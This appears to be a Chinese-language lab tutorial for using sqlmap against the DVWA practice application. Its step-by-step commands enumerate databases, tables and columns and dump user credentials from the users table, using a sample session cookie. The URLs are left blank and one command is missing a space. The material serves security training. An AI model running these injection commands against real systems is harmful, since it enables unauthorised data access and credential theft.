Sqlmap自动化注入操作步骤

一、POST方法操作步骤

1、打开DVWA，访问sqlinjection，输入1-6任意数据。提交，复制地址。

2、获取cookie

3、查询数据库

sqlmap -u " 前面复制的地址" 

--cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch

4、查询dvwa下的表

sqlmap-u ""

--cookie="security=low;PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa --tables

5、查询users下的列

sqlmap -u "" 

--cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa -T users --columns

6、获得表的数据

查询用户名、密码

sqlmap -u ""

 --cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa -T users -C user,password,user_id --dump